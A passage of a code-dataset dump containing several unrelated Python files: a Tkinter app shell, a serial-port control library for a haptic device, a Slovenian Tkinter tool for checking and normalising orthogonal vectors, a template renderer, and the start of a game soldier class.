print(num_illuminated(5, 3, -1, 0, -1, -1, 4, 2))\r\n # print(num_illuminated(1, 1, -1, -1, -1, -1, 2, 2))\r\n\r\n","sub_path":"hackerrank/akuna/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138683100","text":"from pathlib import Path\nfrom tkinter import *\nfrom tkinter import filedialog, messagebox\nfrom tkinter.ttk import Style\nfrom functools import partial\nfrom CustomNotebook import CustomNotebook\nfrom interface_affichage import *\nfrom kernel import *\n\n\nclass App(Frame):\n def __init__(self, master=None):\n combostyle = Style()\n combostyle.theme_create('combostyle', parent='alt',\n settings={'TCombobox':\n {'configure':\n {'selectbackground': 'white',\n 'fieldbackground': 'white',\n 'lightcolor': 'black',\n 'selectforeground': 'black',\n 'bordercolor': 'white',\n }}}\n )\n # ATTENTION: this applies the new style 'combostyle' to all tCombobox\n combostyle.theme_use('combostyle')\n Frame.__init__(self, master)\n Grid.rowconfigure(self, 0, weight=1)\n Grid.columnconfigure(self, 0, weight=1)\n self.files = {}\n self.notebook_frames = {}\n self.lastworkarea = 0\n self.top = None\n self.master.title(\"Blablacar\")\n self.master.geometry(\"1000x700\")\n menu = Menu(self)\n self.master.config(menu=menu)\n fichier_menu = Menu(menu, tearoff=\"false\")\n menu.add_cascade(label=\"Fichier\", menu=fichier_menu, )\n importer = Menu(fichier_menu, tearoff=\"false\")\n importer.add_command(label=\"Fichier TSP\", command=self.open_file_instance)\n # fichier_menu.add_command(label=\"Importer\",command=None)\n fichier_menu.add_cascade(label=\"Importer\", menu=importer, )\n fichier_menu.add_command(label=\"Exit\", command=self.master.quit)\n\n workarea_menu = Menu(menu, tearoff=\"false\")\n menu.add_cascade(label=\"workarea\", menu=workarea_menu)\n workarea_add = Menu(workarea_menu, tearoff=\"false\")\n self.workarea_add_menu = workarea_add\n workarea_menu.add_cascade(label=\"Add workarea\", menu=workarea_add)\n self.notebook = CustomNotebook(self.master)\n self.notebook.pack(side=\"top\", fill=\"both\", expand=True)\n\n def workarea_add_file(self, menu, file_path):\n # for file_path in self.files.keys():\n # menu.insert_command(label=file_path,command=partial(self.workarea_add,file_path))\n menu.add_command(label=file_path, command=partial(self.workarea_add, file_path))\n\n def workarea_add(self, file_path):\n\n frame = Work_area_Window(self.notebook,file=self.files[file_path])\n self.lastworkarea = self.lastworkarea + 1\n self.notebook_frames[\"Work Area \" + str(self.lastworkarea)] = frame\n self.notebook.add(frame, text=\"Work Area \" + str(self.lastworkarea))\n self.notebook.select(frame)\n None\n\n def open_file_instance(self):\n file_path = filedialog.askopenfilename(title=\"Selectioner un Fichier\")\n print(file_path)\n self.files[file_path]=File(file_path)\n self.workarea_add_file(self.workarea_add_menu, file_path)\n self.workarea_add(file_path)\n\n\n\ndef main():\n root = Tk()\n Grid.rowconfigure(root, 0, weight=1)\n Grid.columnconfigure(root, 0, weight=1)\n app = App(master=root)\n app.pack()\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"207256658","text":"#!/usr/bin/python3\n# coding=utf-8\n\"\"\"\ncreated by MrWang_tju 2018.12.06\nfor control the haptic device\nV1.0.0\n\n2019.2.25\n增加 forcesw函数--》选择是否使能某类型力补偿\n2019.4.13\n0.解决同时使用多个串口时,其他设备占用串口导致得COM编号读取失败 修改为不打开串口,直接查看COM编号的方式\n\n\n\"\"\"\n\nimport serial\n\nimport serial.tools.list_ports\nimport time\n\nimport serial.tools.list_ports as ports\n\n\ndef open_ser(baudrate = 115200,time = 0.01):\n global uart\n port_list = list(serial.tools.list_ports.comports())\n # print([comport.device for comport in serial.tools.list_ports.comports()])\n port_list_name = [comport.device for comport in ports.comports()]\n print(port_list_name)\n # print(port_list)\n # ListPortInfo\n if len(port_list) <= 0:\n print (\"The Serial port can not be found\")\n else:\n print(\"%d serial can be found!\"%(len(port_list)))\n print(\"Please input the serial sort:\")\n num = int(input())\n port_list_0 = list(port_list[num])\n port_serial = port_list_0[0]\n uart = serial.Serial(port_serial, baudrate, timeout=time)\n if uart.isOpen() is True:\n print(uart.name,\"is Opened '%d'\"%(uart.baudrate))\n\n\n\n\"\"\"\nfunction:\n 串口写数据\nArgs:\n data[]\n \nReturn:\n None\n\n\"\"\"\n\n\ndef write_data(data=[]):\n if len(data) == 11:\n data[9] = 0\n sum = 0\n for i in range(8):\n sum =sum + data[i + 1]\n data[9] = sum % 100\n # print(data)\n uart.write(data)\n\n else:\n uart.write(data)\n\n\ndef read_data(num=15):\n # i = 10 # 经过测试,发现正常接收16位耗时大概为500,这里设置1000用来保证数据接收完成\n # byte_list = []\n # byte = 0\n # n_s = True\n byte_list = uart.readall() #timeout 来控制读取时间\n\n '''\n if uart.any() > 0 and n_s:\n if list(uart.read(1))[0] == 123:\n n_s = False\n byte_list.append(123)\n time.sleep(0.01)\n while uart.any() > 0:\n byte_list.append(uart.readchar())\n '''\n return byte_list\n # if len(byte_list) == num:\n # return byte_list\n # else:\n # print(\"接收的数据有误:\")\n # print(byte_list)\n # return []\n\n\n\"\"\"\nfunction:\n 使能或失能驱动板\nArgs:\n state == 1 使能\n == 0 失能\n \nReturn:\n None\n\n\"\"\"\ndef board_enable(state = 1):\n data = [0,0,0,0,0,0,0,0,0,0,0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x10\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\n\"\"\"\nfunction:\n 使能或失能驱动芯片\nArgs:\n state == 1 使能\n == 0 失能\n\nReturn:\n None\n\n\"\"\"\n\n\ndef motor_enable(state=1):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x10\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\"\"\"\nfunction:\n 电机PWM设置\nArgs:\n id: 电机编号\n PwmCValue:电机pwm值 0-1000\n \nReturn:\n None\n\n\"\"\"\n\ndef set_pwmall(PwmValue1 = 500,PwmValue2 = 500,PwmValue3 = 500):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x20\n data[3] = PwmValue1//100\n data[4] = PwmValue1%100\n data[5] = PwmValue2//100\n data[6] = PwmValue2%100\n data[7] = PwmValue3//100\n data[8] = PwmValue3%100\n data[10] = 0x7D\n write_data(data)\n\ndef set_pwm(id = 1, PwmValue1 = 500):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x20\n data[3] = PwmValue1//100\n data[4] = PwmValue1%100\n data[5] = 0\n data[6] = 0\n data[7] = 0\n data[8] = 0\n data[10] = 0x7D\n write_data(data)\n\ndef set_mode(mode = 500):\n \"\"\"\n 设置模式\n #define\t\tCTL_FREE\t\t0x10\t//free Mode\n #define\t\tCTL_ENABLE\t\t0x11\t//board enable\n #define \tCTL_PUSHPULL\t0x12\t//\n\n :param mode:\n :return:\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0\n data[2] = 0x40\n data[3] = mode\n data[4] = 0\n data[5] = 0\n data[6] = 0\n data[7] = 0\n data[8] = 0\n data[10] = 0x7D\n write_data(data)\n\n\n\ndef get_encoder(id=1):\n \"\"\"\n function:\n 编码器数据回读\n Args:\n id: 无意义\n 编码器读数\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x30\n data[3] = 0x20\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n\n # print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n M1EnCounter = UartDataConver(byte_list[2],byte_list[3],byte_list[4])\n M2EnCounter = UartDataConver(byte_list[5],byte_list[6],byte_list[7])\n M3EnCounter = UartDataConver(byte_list[8],byte_list[9],byte_list[10])\n print (\"Encoder M1 \", M1EnCounter, \" M2 \", M2EnCounter, \" M3 \", M3EnCounter)\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\n\ndef get_pwm(id=1):\n \"\"\"\n function:\n 编码器数据回读\n Args:\n id: 无意义\n PwmCValue:电机pwm值 0-1000\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = id\n data[2] = 0x31\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n\n # print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n M1PWM = UartDataConver(byte_list[2],byte_list[3],byte_list[4])\n M2PWM = UartDataConver(byte_list[5],byte_list[6],byte_list[7])\n M3PWM = UartDataConver(byte_list[8],byte_list[9],byte_list[10])\n print (\"PWM M1: \",M1PWM,\" M2 : \",M2PWM,\" M3 : \",M3PWM)\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\ndef get_pwm_times(tim = 0.2):\n while 1:\n get_pwm(0)\n time.sleep(tim)\n\n\n\"\"\"\nfunction:\n 选择不同种类的力是否使能\nArgs:\n state == 1 使能\n == 0 失能\n \n#define\t\tCMD_ForceSwitch\t\t0x41\t//不同种类力补偿类型\n#define\t\tCTL_StaFreFlag\t\t0x11\n#define\t\tCTL_DynFreFlag\t\t0x12\n#define\t\tCTL_GraFlag\t\t\t0x13\n#define\t\tCTL_InerFlag\t\t0x14\n\nReturn:\n None\n\n\"\"\"\n\n\ndef force_sw(num = 0,state=1):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x41\n if(num==0):\n print(\"num = 1-4 对应 1.静摩擦 2.滑动摩擦 3.重力 4.惯性力\")\n else:\n if num == 1:\n data[3] = 0x11\n elif num == 2:\n data[3] = 0x12\n elif num == 3:\n data[3] = 0x13\n elif num == 4:\n data[3] = 0x14\n data[4] = state\n data[10] = 0x7D\n write_data(data)\n\ndef write_flash(num = 1,value = 0):\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x11\n data[4] = num\n\n data[5] = int(value/256)\n data[6] = value%256\n data[10] = 0x7D\n write_data(data)\n\n\"\"\"\n输出flash表内容\n\n\"\"\"\ndef flash():\n print(\"力反馈设备 固定参数FLASH表\"\n \"0,\t//1.产品型号\\n\"\n \"0,\t//2.软件版本\t\t\t\t\t\t\t\t\t\t\t2\\n\"\n \"0,\t//3.机械结构版本\t\t\t\t\t\t\t\t\t\t3\\n\"\n \"0,\t//4.电路硬件版本\t\t\t\t\t\t\t\t\t\t4\\n\"\n \"500, //5.PWMMID-ui \t电机零扭力参考PWM值\t\t\t\t5\\n\"\n \"15,\t//6.PULL_PWM-ui\t电机同向推拉时 增加的pwm值\t\t\t6\\n\"\n \"54,\t//7.SigPWMPulse-ui 检测到转动后 单电机摩擦力补偿\t7\\n\"\n \"30,\t//8.StopPwm-ui\t检测到静止时 正反向的摩擦力波动\t8\\n\"\n \"88,\t//9.PLPH_Para_k-f\t推拉随速度变化力补偿值 一次函数 k值\t9\\n\"\n \"4,\t//10.PLPH_Para_b-i\t\t\t\t\t\t\t\t\t\t10\\n\"\n \"//return (float)(0.PLPH_Para_k*sp+PLPH_Para_b); 返回本项计算PWM值\\n\"\n \"6,\t//11.重力补偿参数 \\n\"\n \"100,\t//12.InertiaPara-f 惯性力计算 与加速度相乘的系数 \\n\"\n )\n\ndef read_flash(num = 1):\n \"\"\"\n function:\n FLASH表数据回读\n Args:\n num: FLASH 顺序\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x10\n data[4] = num\n data[10] = 0x7D\n write_data(data)\n byte_list = read_data(15)\n # if num>0 and num<=6:\n # part = 1\n # elif num>6 and num<=12:\n # part = 2\n # elif num>12 and num<=18:\n # part = 3\n # elif num>18 and num<=24:\n # part = 4\n print (byte_list)\n data = byte_list\n if len(byte_list) >= 15:\n ca = (data[1] + data[2] + data[3] + data[4] + data[5]+data[6]+data[7]+data[8]\n +data[9]+data[10]+data[11]+data[12]+data[13]) % 100\n if byte_list[14] == ca and byte_list[0] == 123:\n type = byte_list[1]\n if type == 0x30:\n Value = data[((num-1)%6)*2+2] *256 +data[((num-1)%6)*2+3]\n print (\"FLASH表 \",num,\" 对应的值为\",Value)\n else:\n print (\"返回数据非FLASH表\")\n else:\n print(\"返回的数据校验失败\")\n return False\n else:\n print(byte_list)\n print(\"返回的数据位数不够!\")\n return False\n\ndef flash_init():\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x50\n data[3] = 0x13\n data[10] = 0x7D\n write_data(data)\n\ndef UartDataConver(num1=0, num2=0, num3=0):\n if(num1//128==1) is True:\n num1 = (num1 %128)\n data = -(num1*65536 + num2*256 + num3)\n else:\n data = num1*65536 + num2*256 + num3\n\n return data\n\n\ndef debug(state=1):\n \"\"\"\n function:\n 打开或关闭调试模式\n Args:\n state == 1 使能\n == 0 失能\n\n Return:\n None\n\n \"\"\"\n data = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n data[0] = 0x7B\n data[1] = 0x79\n data[2] = 0x80\n if state == 1:\n data[3] = 0x11\n else:\n data[3] = 0x10\n data[10] = 0x7D\n write_data(data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Others/haptic.py","file_name":"haptic.py","file_ext":"py","file_size_in_byte":10998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"257542933","text":"from tkinter import*\nfrom math import*\nfrom tkinter.filedialog import askopenfilename\n\nclass Vektorji():\n def __init__(self, master):\n\n#=================================================================#\n# oznake\n#\n# ni enakega stevila komponent = \"komponente\" \n# nicelni vektor = \"nicelni\"\n#\n# stanje = 0 zaprt prikaz\n# stanje = 1 odprt prikaz\n#\n# ostala stanja enako, samo drugo ime(ostevilcenje)\n#\n# stanje_1 = 0 nisi preveril\n# stanje_1 = 1 so pravokotni\n# stanje_1 = 2 nimajo enakega stevila komponent\n#\n#=================================================================#\n\n#stanja\n\n self.stanje_0 = 0 # stanje izbrane datoteke (0, 1)\n self.stanje_1 = 0 # stanje pravokotnosti (0, 1, 2)\n self.stanje_2 = 0 # izpis help (0, 1)\n self.stanje_3 = 0 # izpis vektorji (0, 1)\n self.stanje_4 = 0 # stanje normirani (0, 1)\n self.stanje_5 = 0 # izpis ortonormirani (0, 1)\n\n#pojavitvena besedila\n \n self.warn = StringVar(master, value = None)\n self.check = StringVar(master, value = None)\n self.norm = StringVar(master, value = None)\n self.save = StringVar(master, value=None)\n self.help = StringVar(master, value = None)\n self.vect1 = StringVar(master, value = None)\n self.vect2 = StringVar(master, value = None)\n self.dat = StringVar(master, value = None)\n self.warning = StringVar(master, value = None)\n \n\n#besedila, polja\n\n besedilo_1 = Label(textvariable = self.warning)\n besedilo_1.grid(row = 3, column = 3)\n\n besedilo_2 = Label(master, text = \"Preverite, če seznam vektorjev tvori ortogonalen sistem\", width = 45, anchor = W)\n besedilo_2.grid(row = 1, column = 0)\n\n besedilo_3 = Label(master, text = \"Tvorite ortonormirano bazo prostora\", width = 45, anchor = W)\n besedilo_3.grid(row = 2, column = 0) \n\n besedilo_4 = Label(master, text=\"Seznam baznih vektorjev prostora shranite v datoteko\", width = 45, anchor = W)\n besedilo_4.grid(row = 3, column = 0)\n\n besedilo_5 = Label(textvariable = self.warn)\n besedilo_5.grid(row = 0, column = 2)\n \n besedilo_6 = Label(textvariable = self.vect1)\n besedilo_6.grid(row = 4, column = 0, columnspan = 2)\n\n besedilo_7 = Label(text = \"Izberite datoteko\", width = 45, anchor = W)\n besedilo_7.grid(row = 0, column = 0)\n\n besedilo_8 = Label(textvariable = self.check, width = 40)\n besedilo_8.grid(row = 1, column = 2)\n\n besedilo_9 = Label(textvariable = self.norm, width = 40)\n besedilo_9.grid(row = 2, column = 2)\n\n besedilo_10 = Label(textvariable =self.save, width = 40)\n besedilo_10.grid(row = 3, column = 2)\n\n besedilo_11 = Label(textvariable = self.vect2)\n besedilo_11.grid(row = 4, column = 2, columnspan = 2)\n\n#gumbi\n\n gumb_preveri = Button(master, text = \"Preveri\", command = self.preveri, width = 12)\n gumb_preveri.grid(row = 1, column = 1)\n\n gumb_normiraj = Button(master, text = \"Normiraj\", command = self.normiraj, width = 12)\n gumb_normiraj.grid(row = 2, column = 1)\n\n gumb_shrani = Button(master, text = \"Shrani\", command = self.shrani, width = 12)\n gumb_shrani.grid(row = 3, column = 1)\n\n gumb_pomoc = Button(master, text=\"Pomoč\", command = self.pomoc, width = 20)\n gumb_pomoc.grid(row = 0, column = 3)\n\n gumb_izpis = Button(master, text = \"Izpis vektorjev\", command = self.izpis, width = 20)\n gumb_izpis.grid(row = 1, column = 3)\n\n gumb_normirani = Button(master, text = \"Izpis ortonormirane baze\", command = self.normirani, width = 20)\n gumb_normirani.grid(row = 2, column = 3)\n\n gumb_odpri = Button(master, text = \"Odpri\", command = self.odpri, width = 12)\n gumb_odpri.grid(row = 0, column = 1)\n\n#metode \n\n def preveri(self):\n if self.stanje_0 == 1:\n if self.stanje_1 == 0:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n if pravokotni(seznam):\n self.check.set(\"Vektorji so pravokotni\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 1 \n if pravokotni(seznam) == False or pravokotni(seznam) == \"nicla\":\n self.check.set(\"Vektorji niso pravokotni\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 2\n if pravokotni(seznam) == \"komponente\":\n self.check.set(\"Vektorji nimajo enakega števila komponent\")\n self.save.set(\"\")\n self.norm.set(\"\")\n self.warning.set(\"\")\n self.stanje_1 = 2 \n elif self.stanje_1 == 1:\n pass\n elif self.stanje_0 == 0:\n self.check.set(\"Izberite datoteko\") \n \n def normiraj(self):\n if self.stanje_0 == 1:\n if self.stanje_1 == 0:\n self.norm.set(\"Preverite, če so vektorji pravokotni\") \n if self.stanje_1 == 1:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i]) \n self.norm.set(\"Vektorji so normirani\")\n self.warning.set(\"\")\n self.stanje_4 = 1\n if self.stanje_1 == 2:\n self.norm.set(\"Ne moremo tvoriti ortonormirane baze prostora\")\n self.save.set(\"\")\n self.stanje_4 = 2\n if self.stanje_0 == 0:\n self.norm.set(\"Izberite datoteko\")\n \n def shrani(self):\n if self.stanje_0 == 1:\n if self.stanje_4 == 0:\n self.save.set(\"Preverite, če so vektorji ortonormirani\") \n if self.stanje_4 == 1:\n ime = filedialog.asksaveasfilename()\n seznam = []\n if ime == \"\":\n return\n g = open(ime, \"w\", encoding = \"UTF-8\")\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f :\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i])\n pisi = \"[\"\n for i in range(len(nov_seznam) -1):\n pisi += str(nov_seznam[i]) + \";\"\n pisi += str(nov_seznam[-1]) \n pisi += \"]\"\n g.write(pisi)\n g.close\n self.save.set(\"Shranjeno\")\n if self.stanje_4 == 2:\n self.save.set(\"Vektorji niso ortonormirani\")\n elif self.stanje_0 == 0:\n self.save.set(\"Najprej izberite datoteko in preverite ortogonalnost\") \n\n def pomoc(self):\n okno = Toplevel()\n okno.title(\"Pomoč\")\n besedilo_okno = Message(okno, text =\n\"\"\"V prvi vrstici imate gumb odpri, s klikom nanj se odpre okno, s pomočjo katerega izberete željeno datoteko.\nVsebina datoteke naj bo napisana v obliki seznama seznamov, pri čemer elementi seznama predstavlajo vektorje, npr: \\n\n[[x1,x2,x3,x4,x5];[y1,y2,y3,y4,y5];[z1,z2,z3,z4,z5]] \\n\nS pritiskom na gumb \"Preveri\", preverite, če so vektorji v seznamu med seboj pravkotni.\nV primeru, da so pravokotni, jih lahko s pritiskom na gumb \"Normiraj\" normirate in tako tvorite ortonormirano bazo prostora generiranega s temi vektorji.\nS pritiskom na gumb \"Izpiši\" si seznam vektorjev lahko izpišete, s pritiskom na gumb \"Shrani\" pa shranite ortonormiran sistem v novo datoteko.\n\"\"\")\n besedilo_okno.pack()\n gumb_okno = Button(okno, text = \"Vredu\", command = okno.destroy)\n gumb_okno.pack()\n\n def izpis(self):\n if self.stanje_0 == 1:\n if self.stanje_3 == 0:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n izpis = \"Vektorji: \\n \\n\"\n for i in range(len(seznam) -1):\n izpis += str(seznam[i]) + \",\" + \"\\n\"\n izpis += str(seznam[-1]) +\".\"\n self.vect1.set(izpis)\n self.stanje_3 = 1\n elif self.stanje_3 == 1:\n self.vect1.set(\"\")\n self.stanje_3 = 0\n elif self.stanje_0 == 0:\n self.warning.set(\"Izberite datoteko\")\n\n def normirani(self):\n if self.stanje_0 == 1:\n if self.stanje_4 == 1:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i])\n if self.stanje_5 == 0:\n izpis = \"Ortonormirana baza: \\n \\n\"\n for i in range(len(nov_seznam) -1):\n izpis += str(nov_seznam[i]) + \",\" + \"\\n\"\n izpis += str(nov_seznam[-1]) +\".\"\n self.vect2.set(izpis)\n self.stanje_5 = 1\n elif self.stanje_5 == 1:\n self.vect2.set(\"\")\n self.stanje_5 = 0\n if self.stanje_4 == 0:\n self.warning.set(\"Preverite ortonormiranost\")\n if self.stanje_1 == 2:\n self.warning.set(\"Ni mogoče izpisati\")\n elif self.stanje_0 == 0:\n self.warning.set(\"Izberite datoteko\")\n\n def odpri(self):\n self.warn.set(\"\")\n self.check.set(\"\")\n self.norm.set(\"\")\n self.save.set(\"\")\n self.help.set(\"\")\n self.vect1.set(\"\")\n self.vect2.set(\"\")\n self.warning.set(\"\")\n self.stanje_0 = 0\n self.stanje_1 = 0\n self.stanje_2 = 0\n self.stanje_3 = 0\n self.stanje_4 = 0\n self.stanje_5 = 0\n filename = askopenfilename()\n self.dat = filename\n if self.dat != \"\":\n self.stanje_0 = 1\n else:\n self.stanje_0 = 0\n\n# funkcije izven razreda\n\ndef skalarni(v1,v2):\n produkt = 0\n for i, j in zip(v1,v2):\n produkt += i * j\n return produkt\n\ndef isti_prostor(sez):\n dolzina = len(sez[0])\n for i in range(len(sez)):\n if len(sez[i]) != dolzina:\n return False\n return True\n\ndef nicelni(sez):\n for i in range(len(sez)):\n if sez[i] == [0 for j in range(len(sez[i]))]:\n return True\n return False\n\ndef normiraj(v1):\n norma =(skalarni(v1,v1))**(1/2)\n for i in range(len(v1)):\n if float(v1[i]/norma) == int(float(v1[i]/norma)):\n v1[i] = int(float(v1[i]/norma))\n else:\n v1[i] = round(float(v1[i]/norma), 4)\n return v1 \n\ndef pravokotni(sez):\n vsota = 0\n if isti_prostor(sez):\n if nicelni(sez):\n return \"nicla\"\n else:\n for indeks1 in range(len(sez) - 1):\n for indeks2 in range(indeks1 + 1, len(sez)):\n vsota += skalarni(sez[indeks1],sez[indeks2])\n if vsota == 0:\n return True\n else:\n return False\n else:\n return \"komponente\"\n\nroot = Tk()\n\nroot.title(\"Vektorji\")\n\naplikacija = Vektorji(root)\n\nroot.mainloop()\n","sub_path":"vektorji.py","file_name":"vektorji.py","file_ext":"py","file_size_in_byte":15045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"350641620","text":"import os\nimport json\nimport pystache\nimport pkg_resources\n\ndef build_screenplay(actions, root_output_dir, initial_basket_position, episode_number):\n actions_string = json.dumps(actions);\n \n resource_package = __name__\n templates_path = '/'.join(('templates', 'actions.moustache.js'))\n template = pkg_resources.resource_string(resource_package, templates_path)\n \n output_dir = '{}/screenplays'.format(root_output_dir)\n os.makedirs(output_dir, exist_ok=True)\n result_file = open('{}/episode-{}-actions.js'.format(output_dir, episode_number), 'w')\n result_file.write(pystache.render(template, { 'json': actions_string, 'initialBasketPosition': initial_basket_position }))\n result_file.close()","sub_path":"ballistic/ballistic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616850606","text":"# coding: utf-8\n\nfrom element_mobile_tireur import *\nfrom personne import *\n\n\nclass Soldat(Personne, ElementMobileTireur):\n def __init__(self, type_pers, carte: Carte, x_sur_carte: int, y_sur_carte: int, objectif: (int, int) = None,\n orientation=0, alea=0):\n ElementMobileTireur.__init__(self, type_pers, carte, x_sur_carte, y_sur_carte, Tireur(type_pers),\n True, objectif, orientation, alea)\n Personne.__init__(self, type_pers, carte, x_sur_carte, y_sur_carte, objectif, orientation, alea)\n\n def new_objectif(self, x_carte, y_carte, i_pos: int = None, j_pos: int = None, i_objectif: int = None,\n j_objectif: int = None, modification_chemin_seulement=False, alea=0):\n self.immobile = False\n self.annule_cible()\n self.niveau_d_intelligence_actuel = 0\n Personne.new_objectif(self, x_carte, y_carte, i_pos, j_pos, i_objectif, j_objectif,\n modification_chemin_seulement, alea=alea)\n\n def new_cible_obligatoire(self, cible: Element):\n self.cible = cible\n self.niveau_d_intelligence_actuel = 0\n\n def stop(self):\n Personne.stop(self)\n self.immobile = False\n self.niveau_d_intelligence_actuel = self.niveau_d_intelligence\n self.cible = None\n\n def immobilise(self):\n self.stop()\n self.immobile = True\n\n def new_choc(self, nb_chocs_max=NB_CHOC_AVANT_ABANDON_OBJECTIF):\n if self.cible is not None:\n nb_chocs_max = int(nb_chocs_max * COEF_NB_CHOC_AVANT_ABANDON_OBJECTIF_CIBLE_SOLDAT)\n if Personne.new_choc(self, nb_chocs_max):\n self.cible = None\n return True\n return False\n\n def update_tireur(self):\n if self.objectif is None and self.cible is None:\n self.niveau_d_intelligence_actuel = self.niveau_d_intelligence\n ElementMobileTireur.update_tireur(self)\n\n def affiche_objectif(self, screen: pygame.Surface):\n if self.cible is not None:\n x_cible, y_cible = 0, 0\n if isinstance(self.cible, Batiment):\n x_cible, y_cible = self.carte.ij_case_to_centre_xy_relatif(self.cible.i, self.cible.j)\n elif isinstance(self.cible, ElementMobile):\n x_cible, y_cible = self.carte.xy_carte_to_xy_relatif(self.cible.x_sur_carte, 